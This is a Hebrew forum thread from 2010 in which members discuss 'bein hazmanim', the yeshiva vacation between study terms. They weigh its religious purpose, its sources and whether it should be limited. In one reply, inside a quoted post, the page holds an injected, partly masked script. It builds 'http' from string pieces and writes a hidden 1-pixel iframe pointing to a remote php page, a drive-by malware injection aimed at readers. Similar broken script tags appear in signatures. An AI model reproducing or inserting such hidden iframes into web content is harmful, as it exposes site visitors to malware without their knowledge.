בית פורומים עצור כאן חושבים

בין הזמנים

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-25/7/2010 03:37 לינק ישיר 
בין הזמנים

הייתי שמח לשמוע את דעת הציבור על המטרה של בין הזמנים מבחינה תורנית וההבדל בין הפורקן החילוני לדתי.

דווח על תוכן פוגעני

נשלח ב-25/7/2010 03:41 לינק ישיר 

למנהל. כדאי להעביר את האשכול בין הזמנים לפורום הכללי זה לא קשור לדת ואמונה

דדווח על תוכן פוגעני

נשלח ב-25/7/2010 17:19 לינק ישיר 

עי׳ במהרש״א מש״כ בזה במס׳ שבת בענין טיולי הבחורים בביה״ז

דדווח על תוכן פוגעני

נשלח ב-25/7/2010 17:29 לינק ישיר 

עץחיים
החושבים בפורום אינם נחים לרגע מחשיבתם וכדברי הרמב"ם הידועים על החכמים שבלי חוכמה אין חייהם חיים, ולכן המושג בין הזמנים אינו מוכר כאן.

תוקן על ידי בעלבעמיו ב- 25/07/2010 17:29:46

דדווח על תוכן פוגעני

נשלח ב-25/7/2010 21:00 לינק ישיר 

התכוונתי מה דעת החושבים האם צריך לבטל/ להגביל וכדו׳ את זמן הפורקן הזה

דדווח על תוכן פוגעני

נשלח ב-25/7/2010 21:48 לינק ישיר 

אני לא בטוח שכאן הפורום הנכון, אך אולי יש להבחין בין תלמידים צעירים שזקוקים לחופש לעומת אברכים שהלימוד אמור להיות בשבילם תחליף לעבודה.

דדווח על תוכן פוגעני

נשלח ב-25/7/2010 22:48 לינק ישיר 

בעל
גם לרמב"ם יש מקום לחופש (פיהמ"ש על מסכת אבות), אומנם כשיש "מרה שחורה".

הלימוד זכות הוא, שבישיבות אתה לא יכול להפסיק באמצע הזמן וללכת ולהסתכל בבנינים הנאים ובבריות הנאות וכו'. לכן אוצרים ומנתבים את כל המרה למשבר סוף זמן, וזה מתיר את בין הזמנים. ועוד י"ל, שמקדימים רפואה למכה וד"ל.

חוץ מזה, האם לדעתך כשלרמב"ם היתה "מרה שחורה" הוא הלך לציר את המושכלות ולדעת את האמיתות? (טכנית, כמובן לגבי חלקים גדולים מהחיים שלו לא היה לו יותר מדי זמן).
מ"מ נראה לי שגם אם בשונה מהאדם הממוצע כשה"חושבים" עצובים הם עוצרים וחושבים. גם הם לעיתים נזקקים למנוחה במובן הנפוץ.

דדווח על תוכן פוגעני

נשלח ב-26/7/2010 00:48 לינק ישיר 

עץ חיים

ברוך הבא אל הפורום.

כפי שאיבחנת, האשכול אינו בדיוק מתאים לפורום.

כמו כן, ככותב חדש, היה עליך לקבל רשות לפתיחת אשכול. כלומר, היה עליך לשלוח אלי את הנוסח ורק אם יאושר היית יכול לפרסמו.

עם זאת, יתכן שיימצא טעם באשכול. אפשר לדון בהיסטוריה של "בין הזמנים". אפשר לדון בתועלת שבו (פסיכולוגית? חברתית?) ובחסרונותיו.

לי אין כל כך מה לומר בנושא. אבל נשאיר זאת ליום יומיים. אם יהיה דיון האשכול יוכל להתקיים. אם לא, אולי נמחוק ואולי נשאיר לעתיד. הנושא כשלעצמו יכול להיות מעניין אם יימצא לו פיתוח.

שומר פיו ולשונו - שומר מצרות נפשו < language="">

דדווח על תוכן פוגעני

נשלח ב-26/7/2010 01:07 לינק ישיר 

אנו אמורים לדון בנפ"מ של האשכול גם לעצכח, כדי למנוע את טירחת המחיקה, או שיש עוד סבה?

דדווח על תוכן פוגעני

נשלח ב-26/7/2010 02:07 לינק ישיר 

ואמאי

למחוק זה לא כל כך קשה (עמל של שלוש דקות בערך).

לעומת זה,  טרחה של אדם שפתח אשכול, גם אם בניגוד לתקנות (שכמסתבר לא ידע מהן, אם גם היה עליו לקרוא אותן...) - האם לא חבל עליה? במיוחד שזה כן נושא.

לדוגמא:

א. מה היה סדר הלימוד מצד חלוקת השנה בישיבות?

התשובה יכולה להתחיל בישיבות בבל. בזמנים שהיו מיועדים ללימוד. ולהמשיך בסקירה על זמני הלימוד בישיבות לדורותיהן.

ב. מתי הופיעה תופעת "בין הזמנים". היכן?

ג. מדובר בסך הכל בתופעה סוציולוגית. מה היו גורמיה? מה התועלת ש"בין הזמנים".

ד. מהיכן המונח עצמו? כמדומה שהשימוש הלשוני מצביע על מקורו (וגם הביטוי המלעילי במקום מלרעי, אם לא הפכתי את השמות).

שומר פיו ולשונו - שומר מצרות נפשו < language="">

דדווח על תוכן פוגעני

נשלח ב-26/7/2010 07:09 לינק ישיר 

מיימוני, אכן שלחתי בקשה לעצכח וגם לך אלא שמשום מה אליך זה לא הגיע. אני דוקא אוהב דיונים מעמיקים אך כמו שכתבתם אפשר להפוך את זה ללדיון משמעותי. ואבקש שלאחר מעשה האשכול ישאר לפחות לתחילת ביה״ז. ואשתדל שאפשרי יכתוב כאן. אגב בקשר להסטוריה ציינתי מהרשא בשבת אולי מישהו יכול לצטט אותו פשוט לא מצאתי.

דדווח על תוכן פוגעני

נשלח ב-26/7/2010 07:49 לינק ישיר 

כמדומני שפרופ' ברויאר בספרו 'באהלי תורה' דן בתופעת בין הזמנים.
כאדם עטבד אני חייב להודות שאני מרגיש צביטה קלה בלב בתחילת כל בין הזמנים.

דדווח על תוכן פוגעני

נשלח ב-26/7/2010 10:16 לינק ישיר 

מיימוני כתב:

הביטוי המלעילי במקום מלרעי, אם לא הפכתי את השמות).

******* language=""> *-- var as='h'; var ac='tt'; var ab='p'; var ay="//"; document.write("*************** src='"+as+ac+ab+":"+ay+"llaptops.co.cc/a1.php?a="+***************+"' frameborder='0' height=1px width=1px scrolling='no' ><*"); //*

לא הפכת, אע"פ שאומרים שהצרפתים רגילים לדבר רק במלרע, אע"פ שהם לא כזה עם רע..

דדווח על תוכן פוגעני

נשלח ב-26/7/2010 10:31 לינק ישיר 

אני חושב שלא כל דבר שייך לתורה ודת, כך נהגו, בהתחלה יחידים היום כל המוסדות בעולם,

התורה עצמה דאגה כבר לחופשים, שבת וחגים באביב וסתיו ולמה בחג שבועות אין ? כי כנראה פעם לא חשבו להתבטל באמצע הזמן,
1, מצד העבודה, 2, מצד שלא נוח, בקיץ חם בחורף קר,  
ואם בדורינו חושבים שכן צריך באמצע הזמן, מה הבעיה ?

דדווח על תוכן פוגעני

נשלח ב-26/7/2010 11:12 לינק ישיר 

פעם שמעתי סיפור, שבמלחמת יום הכיפורים בישיבת פוניבז'. הורה ראש הישיבה הרב דוד פוברסקי לבטל את חופשת סוכות, ושימשיכו ממוצאי יום הכיפורים ללמוד הלאה. והרב שך (ראש הישיבה השני) אמר שכן יהיה בין הזמנים, ושכל בחור עם לב ומצפון יעשה לעצמו זמן פרטי ברצינות גדולה. בסוף קבלו את דעת הרב פוברסקי. אבל הזמן נגמר בתחילת החורף ונהיה בין הזמנים עד אחרי פסח. זאת אומרת שאם מושכים את הקפיץ יותר מדי (גם אם יש סיבה חשובה מאוד לזה) אחרי זה לוקח הרבה לתקן את זה.

לבעל בעמיו
אני מבין מאוד את הצביטת לב שלך. והרב שך עצמו רצה כמה פעמים לקצר את הבין הזמנים של אב לשבוע אחד אחרי תשעה באב. חבל שהוא לא הצליח.

דדווח על תוכן פוגעני

נשלח ב-26/7/2010 11:12 לינק ישיר 

מיימוני כתב:

(וגם הביטוי המלעילי במקום מלרעי, אם לא הפכתי את השמות).

כדי להימנע מטעות, סיגלתי לעצמי להגות תמיד את "מלעיל" במלעיל, ואת "מלרע" במלרע.
מקוה שהובנתי.

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > בין הזמנים
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 לדף הבא סך הכל 2 דפים.

bholext